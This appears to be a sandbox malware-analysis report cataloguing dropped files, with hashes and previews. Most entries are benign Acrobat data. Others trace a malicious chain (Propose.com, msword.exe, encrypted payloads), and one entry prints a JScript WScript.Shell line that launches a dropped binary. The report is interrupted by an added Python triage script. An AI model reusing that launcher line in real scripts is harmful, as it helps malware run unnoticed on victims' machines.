                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.281169410644327
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfbPtdPeUkwRe9:YvXKXmapj2Zc0vYGDV8Ukee9
                                                                  MD5:242E630D5B6645F683C1BB3FEDF7C5BA
                                                                  SHA1:73A99881899ABA3A8587CB68B733974F203FA4C5
                                                                  SHA-256:481A2C5786A74FB51348EA6FE78E4E7502C22FDC2E5BA27EE30B164A151B4113
                                                                  SHA-512:2E609570C9DB56BD230F1C9E1518CEDA4DB2607BD86B3F575274A61BF096062CA7ECB3D33A35AA487789023BD2863EDE681E68D29E49A0FC09A3CEF43DD642A9
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):287
                                                                  Entropy (8bit):5.2860835903723
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJf21rPeUkwRe9:YvXKXmapj2Zc0vYG+16Ukee9
                                                                  MD5:B23AD72F9F5C94299E00D200D46ECA9C
                                                                  SHA1:A214D1D89D052BF1B86455069620E0D413F22E75
                                                                  SHA-256:77D35C9C354FBD18D2D6E410BB79EDE8BCE3B38615688F22682B861FBCD3BD2D
                                                                  SHA-512:17BBEB9767682F2AE71203B103C0A2EE4711DDBBE25BF9B0BF0C519CEBEDBA5D7ABD9A3A4EBC44753CF85B37867405D5A89D0ABEF337C887A3150A5B6C64A65A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1090
                                                                  Entropy (8bit):5.663658096257025
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6X2zvtamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSr:Yv1JBgkDMUJUAh8cvMr
                                                                  MD5:4A672D441DB4D967BA257668C04DA538
                                                                  SHA1:EE0ADED1D2B3A77D1DE02DC7DED303AD36097E52
                                                                  SHA-256:0DB63E2BDEB066574A0DBD8ACDFF20DAF3E50595CE55E2C02386C77324EA7087
                                                                  SHA-512:7CE0C1B05FE318C1E26D9792C0661658A2F9F06A8C87A38D1FF28539CD093292BF07C934BC59EC2F05B745CA46C0C604CB0392CA8CBDD859E9C4FD44EEF0EE78
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):286
                                                                  Entropy (8bit):5.262139454704628
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfshHHrPeUkwRe9:YvXKXmapj2Zc0vYGUUUkee9
                                                                  MD5:4533F5E544C1ABEFE9D9154B813740FD
                                                                  SHA1:D76AA5EAF8272C5E48FD9B84A8AD7010CCEF830A
                                                                  SHA-256:9B769F34109F86EB4BDBA5B9539B9787F45086F84C350382F6998123A4458BC2
                                                                  SHA-512:6B4EC80BF227029E8EA42DC1192EE0C65A42EDE9DD0B5D629BC3F213737A53A9D15C9932876EEAFB2B0CE45BCB9DA06EAFB9B2804EEEB83FB4CA9B8EB8666896
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):5.269394349154731
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJTqgFCrPeUkwRe9:YvXKXmapj2Zc0vYGTq16Ukee9
                                                                  MD5:6EBE9A33323E2DC0925B39F10D7A3101
                                                                  SHA1:192E6CE39221BB008E4783963481EE3A34F34765
                                                                  SHA-256:E304AE90DF70342F2EB2D865C6832A6B020A824B1B7419DAA875A82510CECC1D
                                                                  SHA-512:E2C4586A28A37C99E866207227C3287123706F880A977202B46A7BE07F412D31BAFF30E0A83FE8708652CEF6C944A2D0E03FEB8055476B42822875550897310A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):0.8112781244591328
                                                                  Encrypted:false
                                                                  SSDEEP:3:e:e
                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                  Malicious:false
                                                                  Preview:....
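The `Entropy (8bit)` column above is Shannon entropy in bits per byte, and the 4-byte file just listed (entropy 0.8112781244591328, `Malicious:false`) is exactly what a three-to-one split of two byte values produces. The following Python is an added example, not code from the Joe Sandbox report: it reproduces that metric, parses these flattened `Key:Value` records (one record per `Process:` line, as laid out on this page) and runs a few triage rules over them. The sample text is constructed from two of the records above, the known-good allowlist entry and the 7.5-bit "looks packed or encrypted" threshold are assumptions of the example, not values from the report.

```python
import math
from collections import Counter

# Constructed from two of the dropped-file records on this page (the 4-byte
# 'data' file and the first Acrobat JSON surface record). Leading whitespace
# mirrors the report's layout so the parser has to strip it.
SAMPLE_REPORT = r"""
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:data
        Category:dropped
        Size (bytes):4
        Entropy (8bit):0.8112781244591328
        Encrypted:false
        SSDEEP:3:e:e
        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
        Malicious:false
        Preview:....
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):295
        Entropy (8bit):5.3567434671151055
        Encrypted:false
        MD5:B9BBD79E108A3EDE650B19B9A53EED3C
        SHA-256:8DBC5832E911452B4A83265778E8E743FE8F85DB04B86B0D58827B4E062D4DA8
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca"}}
"""

# Assumption for the example: an organisation's known-good set, here just the
# 4-byte file's SHA-256. A real allowlist would come from a golden image.
KNOWN_GOOD_SHA256 = frozenset({
    "81ff65efc4487853bdb4625559e69ab44f19e0f5efbd6d5b2af5e3ab267c8e06",
})

# Assumption: above this many bits per byte a file is usually compressed,
# packed or encrypted, so an 'Encrypted:false' verdict deserves a second look.
HIGH_ENTROPY_BITS = 7.5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)'.
    0.0 when every byte is identical, 8.0 when all 256 values are equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_records(text: str) -> list[dict]:
    """Split the flattened report into one dict per dropped file.

    A record starts at each 'Process:' line. Values are split on the FIRST
    colon only, so previews and file types containing ':' survive intact.
    Size and Entropy are converted to numbers; everything else stays text."""
    records: list[dict] = []
    current: dict | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Process":
            current = {}
            records.append(current)
        if current is None:
            continue  # lines belonging to a record whose start was cut off
        if key == "Size (bytes)":
            current["Size"] = int(value)
        elif key.startswith("Entropy"):
            current["Entropy"] = float(value)
        else:
            current[key] = value
    return records


def triage(records: list[dict], allowlist: frozenset[str]) -> list[tuple[int, str]]:
    """Return (record index, reason) pairs that merit a human look:
    the sandbox verdict, a hash outside the known-good set, and high-entropy
    content the report nevertheless marks as not encrypted."""
    findings = []
    for i, r in enumerate(records):
        if r.get("Malicious", "").lower() == "true":
            findings.append((i, "sandbox flagged as malicious"))
        if r.get("SHA-256", "").lower() not in allowlist:
            findings.append((i, "SHA-256 not in known-good allowlist"))
        if r.get("Entropy", 0.0) >= HIGH_ENTROPY_BITS and r.get("Encrypted", "").lower() == "false":
            findings.append((i, "high entropy but not marked encrypted"))
    return findings


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for idx, reason in triage(recs, KNOWN_GOOD_SHA256):
        print(f"record {idx} ({recs[idx]['File Type']}, {recs[idx]['Size']} bytes): {reason}")
```

Running it flags only the JSON record (its hash is not in the assumed allowlist); the 4-byte file passes every rule, and `shannon_entropy(b"\x00\x00\x00\x01")` returns the report's 0.8112781244591328, which is how to sanity-check that a sandbox entropy figure was computed per byte rather than per bit or per symbol.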
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):2814
                                                                  Entropy (8bit):5.135034536060999
                                                                  Encrypted:false
                                                                  SSDEEP:24:YWtpwkGaADIayTayoALSmLJXRe6fha/k7kkKlO3PjW86vj0SRf1UU1CQC2y48BPA:YLgXM6YlqWFj/eT4QPNe+caFSMuQ9JA
                                                                  MD5:80E0F3E44D09197F99CD86B22092CD5C
                                                                  SHA1:77822EF46255E4E3B5C1AEB9A5CB721699B6BEAC
                                                                  SHA-256:0A577FDD0C9B09E1BE46A50F8E95BEC1AAA19B267A0B22FD865F3746041D14B5
                                                                  SHA-512:EAD5CACC6E8FEDC5383487563E0AEB323E6B0FC5ED3AE8EC9CE6EA20FA0C59AFF3B1B930B9CBBBE92F913FB8472CF057E4A6E5288228D3B850CEC7FBF72B96B5
                                                                  Malicious:false
                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2fa6de4bfe6427aebbf750a700f7cf07","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736269989000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"553e3aca3fc5987d1d1d838914a3db1c","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736269989000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d59e5ea4b34fea3b81980dcc85c699b0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736269989000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"bcc045e0d05398e2eb3645a83197b7f4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736269989000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e94ab630f0998830bc2e9853c6b8f90e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736269989000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"d51e1704a0f05df22c3c3cb07625f3ff","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):1.1896414498617545
                                                                  Encrypted:false
                                                                  SSDEEP:48:TGufl2GL7msEHUUUUUUUU89gdSvR9H9vxFGiDIAEkGVvp49gp:lNVmswUUUUUUUU89gd+FGSIt89gp
                                                                  MD5:F74EB3A9C37D529CC19C500605F94B9C
                                                                  SHA1:26F4DCBC487EBB14550A254665FFEB94A2A3EF2B
                                                                  SHA-256:BDF758C0E88A3F0F85C1083981425506C15C8EEDA2B7083B5AB7BCAB2467D3E9
                                                                  SHA-512:9343E5E9FDA2668BB727E859D7AB1B0DDDCC09BA5C633C2ADA492F60C9ED2DF4D4D0EDF468F0CDDD0EF1748A50C4DB1B7E9D108408BD6E9B8D63335215E5A457
                                                                  Malicious:false
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):1.6092194949745733
                                                                  Encrypted:false
                                                                  SSDEEP:48:7MDgKUUUUUUUUUU89glvR9H9vxFGiDIAEkGVvTqFl2GL7msi:7UUUUUUUUUUU89gBFGSItJKVmsi
                                                                  MD5:5230AB786BA12325F462B2E5F3B5110E
                                                                  SHA1:D49436D20E367570608269FB461DFDF7BC2D3606
                                                                  SHA-256:39EBA12357CDC89A3470775FE391FCA8895061EE5C7BFBA3DE05CBBCD2B93793
                                                                  SHA-512:075518A060F1155C98E70120863E9F58A07DE933E963340085A069DDDBA1DB5D109468DEC933BB169E094E14823AE236AFF1BDEE127F09792B7E87F65D29EBF7
                                                                  Malicious:false
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):66726
                                                                  Entropy (8bit):5.392739213842091
                                                                  Encrypted:false
                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgywXm0idnIzlDC8FQvwRqeCEHYyu:6a6TZ44ADEywXRidnIzwdGK
                                                                  MD5:F69DB163835B3657248F134CE8690D78
                                                                  SHA1:48705F214A2FA8B147DDA54E9397B40011F2FB0F
                                                                  SHA-256:933AFAB7EA16FAEA99C10247BC55D5ECDDF6DE3560C9AA904CC51D88916796F6
                                                                  SHA-512:05485061E94339596D2D75F8906DC7A8E2086D8FD6D3742F0AA4DE62018208DDDE19D0CF5F1F450183839978A083C9BC899C66C9CAC3F1E3ECA6BB8E4A4BBE1D
                                                                  Malicious:false
                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: [UPD]Intel_Unit.2.1.exe, Detection: malicious
                                                                  • Filename: 'Set-up.exe, Detection: malicious
                                                                  • Filename: Setup.exe, Detection: malicious
                                                                  • Filename: RailProvides_nopump.exe, Detection: malicious
                                                                  • Filename: c2.hta, Detection: malicious
                                                                  • Filename: installer_1.05_36.8.exe, Detection: malicious
                                                                  • Filename: Setup.exe, Detection: malicious
                                                                  • Filename: DansMinistrie.exe, Detection: malicious
                                                                  • Filename: installer_1.05_36.7.exe, Detection: malicious
                                                                  • Filename: Set-up.exe, Detection: malicious
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):195
                                                                  Entropy (8bit):4.7615351185197845
                                                                  Encrypted:false
                                                                  SSDEEP:6:RiOnJHonwWDKaJkDHLFkNx5AW9GfwWDKaJkDHLFkNx57:YIQjWaiF+/dG7WaiF+/7
                                                                  MD5:9DD76500C74BBB507074A3DA164E755D
                                                                  SHA1:72EBC79800AD7A96DCC8923A186D7ECA36561F28
                                                                  SHA-256:6801E9D84DF9CAAB43718B737D58E5E3CD3CB614DBAFEB50776630FCD8E6694C
                                                                  SHA-512:531E901749A8C5687310E8330A8558384A94C28587AC8B6B3EE362449F2C46B9F27BBF3C162095A030D880E6693E477F62FAB7A2C24F7D89FED0AC0E09A8C494
                                                                  Malicious:true
                                                                  Preview:new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):702975
                                                                  Entropy (8bit):7.9996899596807305
                                                                  Encrypted:true
                                                                  SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                  MD5:40320097845035E71C88A2796F2F751B
                                                                  SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                  SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                  SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                  Malicious:false
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):702975
                                                                  Entropy (8bit):7.9996899596807305
                                                                  Encrypted:true
                                                                  SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                  MD5:40320097845035E71C88A2796F2F751B
                                                                  SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                  SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                  SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):488285
                                                                  Entropy (8bit):7.998550946105718
                                                                  Encrypted:true
                                                                  SSDEEP:12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
                                                                  MD5:7A07DED0E02828AA5F3CFBAD5642C558
                                                                  SHA1:166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
                                                                  SHA-256:2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
                                                                  SHA-512:9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):67584
                                                                  Entropy (8bit):7.997420919125293
                                                                  Encrypted:true
                                                                  SSDEEP:1536:mPM2IWHYOOcbdpzCNBSD2XTn32zuIcRgk64wnWEi8o:mP5THh5b3+n32zo64Ao
                                                                  MD5:18E13DD846278DD017E9BDD8322ACF0E
                                                                  SHA1:431DDC2AF8197F887CF7E9B5346792FDBF0F07E3
                                                                  SHA-256:4784DDD355896DE73BCCCDB7D0AFD69D6376ADE1F3A22B18BFDA58EB4DFB0744
                                                                  SHA-512:005CBE957E2FE900299A82168D0CEB4FF9A89FE82B407103A7DA34BED1C0F12CF22850080D2EB22FAD5A0BAC7813696103BAFCA6735FB31223BEFFF0697CCE2F
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):101376
                                                                  Entropy (8bit):7.9982174281872025
                                                                  Encrypted:true
                                                                  SSDEEP:3072:tYj0CGgXe/2IS6hnqS2WONlLUDBt7itJs6g:tYVG4ehSOnMWONlY9t7itJQ
                                                                  MD5:99A9AA7C4197C9FA2B465011F162397E
                                                                  SHA1:F4501935D473209F9D6312E03E71B65271D709E4
                                                                  SHA-256:6196D79DC188E3581F8446637CF77E8E9105000E7A8A8135213F750D9BC65EB0
                                                                  SHA-512:03EF41FC61EC810C788252EEDCDC7C2616A55C2CF0996F830DAB1A60982589360CAD7C71B76A199A94DE0337BD068AC1A7A6503CE67CC091BAF1C6C6758B01F5
                                                                  Malicious:false
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):97280
                                                                  Entropy (8bit):5.234350627932401
                                                                  Encrypted:false
                                                                  SSDEEP:768:Jx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:JdKaj6iTcPAsAhxjgarB
                                                                  MD5:031B6C0EDF7E1DD8ACF9700CC96085D7
                                                                  SHA1:0819EC14EBC323A9507E52A0579F6F9BA1589C3D
                                                                  SHA-256:7FA45FC5F2F9C52E289D56F5AF6B95427EDC979A838608DC20CB4D89C7078553
                                                                  SHA-512:75577FEEB70AF3025A021FB8DD3FC52B56AC9EC7CE7B0BB24E2970CA3626A0B96984ADB7874AE5608C9A739BC46E5C2207C98B2CB0C40925B2D95B7A2969A7BA
                                                                  Malicious:false
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):4.910075425726921
                                                                  Encrypted:false
                                                                  SSDEEP:768:FOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+3:F5el3EYrDWyu0uZo2+3
                                                                  MD5:2BC25537976C2E146EBED51446CE7B59
                                                                  SHA1:0EBD76401729D4F1B9B4DCAB1586D96CD410A1D2
                                                                  SHA-256:F01BA73C4332997F031434DDA3EBBFE03EE70F9BE65275ABEEDE452E148B94E7
                                                                  SHA-512:7BA4AEA3D8836216CDFB4B27EC7AF041BF9EDB5A0DEA8BEECE8C7950BC9BC793B12F7E7C1A0B4EA6E0194A1211CACBFB06204E68689E0DA3E895BE8518572A80
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):72704
                                                                  Entropy (8bit):7.997164994069138
                                                                  Encrypted:true
                                                                  SSDEEP:1536:bdM1aIyizRac/AX9Cslc7g63p8ueagJNvZoNoWRY6Du/FI84:ZVIyQ/o91658ueaa2PS/FIj
                                                                  MD5:990ABD973C6DDB75837EEB5B21F59AE1
                                                                  SHA1:85846C0CE7CD3314DEC32E3BED99511A59B6500A
